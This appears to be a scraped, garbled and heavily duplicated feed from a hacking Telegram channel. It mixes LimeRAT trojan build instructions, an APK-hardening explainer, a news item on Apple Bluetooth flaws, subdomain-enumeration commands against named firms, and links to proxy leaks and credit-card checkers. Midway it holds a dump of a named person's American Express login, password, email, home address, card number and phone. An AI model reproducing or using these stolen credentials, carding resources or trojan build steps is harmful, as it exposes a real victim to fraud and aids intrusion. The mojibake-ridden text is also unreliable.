β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Windows hacking remontly tutorial :
> LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) download the zip file on your android or linux
2) unzip in non root folder
3) IOpen "LimeRAT.sln"
4) Set Compiler to "Release" mode
5) On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"
7) Everything will be under "\Project_EXE\Release"
8) Convert stub.exe to stub.il, using Ildasm
π¦Creating plugin example:
VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)
Msgbox("Hello Client!")
Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be showen in [LOG] Tab
End Sub
End Class
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Windows hacking remontly tutorial :
> LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) download the zip file on your android or linux
2) unzip in non root folder
3) IOpen "LimeRAT.sln"
4) Set Compiler to "Release" mode
5) On Solution Explorer, Right click on "Solution LimeRAT Project" and press "Rebuild Solution"
7) Everything will be under "\Project_EXE\Release"
8) Convert stub.exe to stub.il, using Ildasm
π¦Creating plugin example:
VB.NET
'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)
Msgbox("Hello Client!")
Send("MSG" + SPL + "Hello Server!")
'Client will send msg back to server, MSG will be showen in [LOG] Tab
End Sub
End Class
@UnderCodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why apk encryption and hardening :
> Android applications are mainly based on Java development
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> Easily cracked
>Make an impact
> Code or key interfaces exposed
> It has even been repackaged and released by others, including advertisements and viruses.
>Huge risks for companies and users
>The most convenient and effective way to deal with cracking
Reinforce
> Through reinforcement, the effects of decompilation and preventing secondary packaging can be achieved to a certain extent
Some other reasons
> For learning purposes, I want to understand, analyze, and learn the internal design and code logic of an Android app
>So need to decompile and crack
>So to prevent others from cracking it is necessary to encrypt and strengthen
>But there are some disadvantages to reinforcement:
>Impact on the application after strengthening
volume
>Startup speed
compatibility
>All platforms can run normally without crashing
The cost
>Charges for some reinforcement schemes
>Customer service response speed
>Some platforms have different response speeds after encryption problems
Wrten by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Why apk encryption and hardening :
> Android applications are mainly based on Java development
instagram.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
> Easily cracked
>Make an impact
> Code or key interfaces exposed
> It has even been repackaged and released by others, including advertisements and viruses.
>Huge risks for companies and users
>The most convenient and effective way to deal with cracking
Reinforce
> Through reinforcement, the effects of decompilation and preventing secondary packaging can be achieved to a certain extent
Some other reasons
> For learning purposes, I want to understand, analyze, and learn the internal design and code logic of an Android app
>So need to decompile and crack
>So to prevent others from cracking it is necessary to encrypt and strengthen
>But there are some disadvantages to reinforcement:
>Impact on the application after strengthening
volume
>Startup speed
compatibility
>All platforms can run normally without crashing
The cost
>Charges for some reinforcement schemes
>Customer service response speed
>Some platforms have different response speeds after encryption problems
Wrten by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to decompile and encrypt apk package in Android security > Your first step for cracking - or edit code...
π¦ ππΌππ πππΈβπ :
1) The first one: code obfuscation technology (ProGuard) This technology is mainly used for code obfuscation to reduce the readability of the code after reverse compilation, but this technology cannot prevent the shelling technology from performing shelling (added code such as fee collection, advertising, and viruses) And, as long as it is a careful person, the code can still be reversely analyzed, so the technology does not fundamentally solve the cracking problem, but only increases the difficulty of cracking.
2) The second kind: signature comparison technology This technology mainly prevents the packing technology from packing, but the risk of reverse code analysis still exists. And this technology can't solve the problem of being packed at all. If the cracker commented out the signature comparison code and compiled it back, the technology will be cracked.
3) The third type: NDK.so dynamic library technology, this technology is to put all the important core code in the C file, use NDK technology to compile the core code into .so dynamic library, and then use JNI to call. Although this technology can protect the core code, the risk of being packed still exists.
4) The fourth type: Dynamic loading technology, which is a relatively mature technology in Java, but the technology has not yet been fully utilized by everyone in Android.
Fifth: third-party platform use
Mainly explain the fourth method. This technology can effectively prevent reverse analysis, cracking, and shelling. The dynamic loading technology is divided into the following steps:
5) Jar package that compiles core code into dex file
6) Encrypt the jar package
Use NDK to decrypt at the main entrance of the program
Then use ClassLoader to dynamically load the jar package
Use reflection technology to set ClassLoader as the system's ClassLoader.
π¦ The main advantages are:
1. The core code is in the encrypted jar, so the cracker cannot decompress the class file. If the encryption key is obtained by the cracker, it will be another level of security issues.
2. This technology can also effectively prevent the packing technology. The code is dynamically loaded. The cracker's shell program cannot be added to the encrypted jar package. The cracker injects the shell program entry in time. The shell program is not in the ClassLoader's jar package. Therefore, it cannot be executed unless the cracker replaces the ClassLoader jar package and turns off the NDK decryption code. But this kind of installation on the mobile phone is no longer our application, and users will definitely uninstall it.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to decompile and encrypt apk package in Android security > Your first step for cracking - or edit code...
π¦ ππΌππ πππΈβπ :
1) The first one: code obfuscation technology (ProGuard) This technology is mainly used for code obfuscation to reduce the readability of the code after reverse compilation, but this technology cannot prevent the shelling technology from performing shelling (added code such as fee collection, advertising, and viruses) And, as long as it is a careful person, the code can still be reversely analyzed, so the technology does not fundamentally solve the cracking problem, but only increases the difficulty of cracking.
2) The second kind: signature comparison technology This technology mainly prevents the packing technology from packing, but the risk of reverse code analysis still exists. And this technology can't solve the problem of being packed at all. If the cracker commented out the signature comparison code and compiled it back, the technology will be cracked.
3) The third type: NDK.so dynamic library technology, this technology is to put all the important core code in the C file, use NDK technology to compile the core code into .so dynamic library, and then use JNI to call. Although this technology can protect the core code, the risk of being packed still exists.
4) The fourth type: Dynamic loading technology, which is a relatively mature technology in Java, but the technology has not yet been fully utilized by everyone in Android.
Fifth: third-party platform use
Mainly explain the fourth method. This technology can effectively prevent reverse analysis, cracking, and shelling. The dynamic loading technology is divided into the following steps:
5) Jar package that compiles core code into dex file
6) Encrypt the jar package
Use NDK to decrypt at the main entrance of the program
Then use ClassLoader to dynamically load the jar package
Use reflection technology to set ClassLoader as the system's ClassLoader.
π¦ The main advantages are:
1. The core code is in the encrypted jar, so the cracker cannot decompress the class file. If the encryption key is obtained by the cracker, it will be another level of security issues.
2. This technology can also effectively prevent the packing technology. The code is dynamically loaded. The cracker's shell program cannot be added to the encrypted jar package. The cracker injects the shell program entry in time. The shell program is not in the ClassLoader's jar package. Therefore, it cannot be executed unless the cracker replaces the ClassLoader jar package and turns off the NDK decryption code. But this kind of installation on the mobile phone is no longer our application, and users will definitely uninstall it.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
β β β iο½ππ»βΊπ«Δπ¬πβ β β β
π¦Apple's Bluetooth protection framework MagicPairing was revealed 10 0day vulnerabilities were not fixed
> Recently, researchers from the University of Darmstadt in Germany checked the MagicPairing protocol and found that its three implementation methods iOS, macOS and RTKIT-there are ten public defects between them, these defects have not yet been resolved.
> Apple Bluetooth protection framework: MagicPairing protocol
MagicPairing is a proprietary protocol of Apple, it can provide seamless pairing function, for example, between the user's Airpods and all their Apple devices through the Apple cloud service iCloud synchronization key to achieve. The ultimate goal of the MagicPair protocol is to derive a Bluetooth link key (LK) for use between a single device and Airpods. Create a new LK for each connection, which means that the lifetime of this LK can be effectively shortened.
π¦Apple's Bluetooth protection framework MagicPairing was revealed 10 0day vulnerabilities were not fixed
> Recently, researchers from the University of Darmstadt in Germany checked the MagicPairing protocol and found that its three implementation methods iOS, macOS and RTKIT-there are ten public defects between them, these defects have not yet been resolved.
> Apple Bluetooth protection framework: MagicPairing protocol
MagicPairing is a proprietary protocol of Apple, it can provide seamless pairing function, for example, between the user's Airpods and all their Apple devices through the Apple cloud service iCloud synchronization key to achieve. The ultimate goal of the MagicPair protocol is to derive a Bluetooth link key (LK) for use between a single device and Airpods. Create a new LK for each connection, which means that the lifetime of this LK can be effectively shortened.
Forwarded from Backup Legal Mega
π¦When a new or reset pair of Airpods initially belongs to an iCloud account with an Apple device, Secure Simple Pairing (SSP) is used. All subsequent Airpods and devices connected to the iCloud account will use the Magicpair protocol as a pairing mechanism. MagicPair contains multiple keys and derived functions. It relies on the Advanced Encryption Standard (AES) in Integrated Initialization Vector (SIV) mode for authentication and encryption.
> The general logic of Magic Pairing is that it can be integrated into any IoT-based ecosystem, thereby increasing the relevance to the entire security community.
> Although MagicPairing protocol overcomes two shortcomings of Bluetooth device pairing : poor scalability and easy to collapse security model defects . (If the permanent key Link Layer or Long-Term Key is trapped, it will crash.)
> However, the researchers used code called ToothPicker to perform wireless fuzzing and in-process fuzzing and found 8 MagicPairing and 2 L2CAP vulnerabilities, which can cause crashes, CPU overload, and paired device associations. According to foreign media reports, the information was disclosed between October 30, 2019 and March 13, 2020, and has not yet been determined
> The general logic of Magic Pairing is that it can be integrated into any IoT-based ecosystem, thereby increasing the relevance to the entire security community.
> Although MagicPairing protocol overcomes two shortcomings of Bluetooth device pairing : poor scalability and easy to collapse security model defects . (If the permanent key Link Layer or Long-Term Key is trapped, it will crash.)
> However, the researchers used code called ToothPicker to perform wireless fuzzing and in-process fuzzing and found 8 MagicPairing and 2 L2CAP vulnerabilities, which can cause crashes, CPU overload, and paired device associations. According to foreign media reports, the information was disclosed between October 30, 2019 and March 13, 2020, and has not yet been determined
Forwarded from Backup Legal Mega
π¦"Because MagicPair is used before pairing and encryption, it provides a huge zero-click wireless attack surface. We found that all different implementations have different problems, including lock-in attacks and denial of service that can cause 100% CPU load. These issues were discovered during the general wireless test and the in-process fuzzing test on iOS. "
@iUndercode
β β β iο½ππ»βΊπ«Δπ¬πβ β β β
@iUndercode
β β β iο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
> full report written by iUndercode
Apple's Bluetooth protection framework MagicPairing was revealed 10 0day vulnerabilities were not fixed
Apple's Bluetooth protection framework MagicPairing was revealed 10 0day vulnerabilities were not fixed
Forwarded from Backup Legal Mega
prem proxies
pastebin.com/WWJ5GDRL β
pastebin.com/WWJ5GDRL β
Pastebin
Premium Fresh Proxies from 1h - Pastebin.com
Forwarded from Backup Legal Mega
Pastebin
NordVpn Premium verified - Pastebin.com
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 cc checkers :
> http://necteknoloji.com/bh7cmz/checker-cc.html
> https://www.freeformatter.com/credit-card-number-generator-validator.html
> https://www.creditcards.com/
> http://mde.com.vn/hnragku/eldersc0de-checker.html
π¦2020 cc checkers :
> http://necteknoloji.com/bh7cmz/checker-cc.html
> https://www.freeformatter.com/credit-card-number-generator-validator.html
> https://www.creditcards.com/
> http://mde.com.vn/hnragku/eldersc0de-checker.html
Freeformatter
Credit Card Number Generator & Validator - FreeFormatter.com
Allows you to generate credit card numbers for all major brands and also to validate them using the Luhn algorithm
π¦americanexpress.com
Username: belfrank
Password: 122399fbm
Email: belfrank@msn.com
Email Pass
#######NBILLING##############
Name: BELINDA MUNIZ
Address: 444 BRIGHTON ST
City : ROANOKE,
State : TX,
Zipcode : 76262-
###################
cc| 371307162121008
Cid
Exp 02/19
Phone: 702129-2366
Username: belfrank
Password: 122399fbm
Email: belfrank@msn.com
Email Pass
#######NBILLING##############
Name: BELINDA MUNIZ
Address: 444 BRIGHTON ST
City : ROANOKE,
State : TX,
Zipcode : 76262-
###################
cc| 371307162121008
Cid
Exp 02/19
Phone: 702129-2366
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to solve the failure to call dllregisterserver on Win10 64-bit?
instagram.com/undercodeTesting
1) Press the win + x key on the keyboard to call up commonly used commands.
2) We want to select "Command Prompt (Admin)".
3) Then enter "regsvr32 c: \ Windows \ SysWOW64 \ comdlg32.ocx" in the "Command Prompt"
4) After entering, press Enter to confirm. After a while, he will be prompted to succeed. This means that we have successfully registered.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to solve the failure to call dllregisterserver on Win10 64-bit?
instagram.com/undercodeTesting
1) Press the win + x key on the keyboard to call up commonly used commands.
2) We want to select "Command Prompt (Admin)".
3) Then enter "regsvr32 c: \ Windows \ SysWOW64 \ comdlg32.ocx" in the "Command Prompt"
4) After entering, press Enter to confirm. After a while, he will be prompted to succeed. This means that we have successfully registered.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦yesterday we post 40 hacking 2020 tools, as extra one will present this :
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Abusing Certificate Transparency logs for getting HTTPS websites subdomains.
t.mE/UndercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/UnaPibaGeek/ctfr.git
2) cd ctfr
3) pip3 install -r requirements.txt
4) python3 ctfr.py --help
-d --domain [target_domain] (required)
-o --output [output_file] (optional)
5)Examples:
$ python3 ctfr.py -d starbucks.com
$ python3 ctfr.py -d facebook.com -o /home/shei/subdomains_fb.txt
β VERIFIED BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Abusing Certificate Transparency logs for getting HTTPS websites subdomains.
t.mE/UndercodeTesting
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/UnaPibaGeek/ctfr.git
2) cd ctfr
3) pip3 install -r requirements.txt
4) python3 ctfr.py --help
-d --domain [target_domain] (required)
-o --output [output_file] (optional)
5)Examples:
$ python3 ctfr.py -d starbucks.com
$ python3 ctfr.py -d facebook.com -o /home/shei/subdomains_fb.txt
β VERIFIED BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β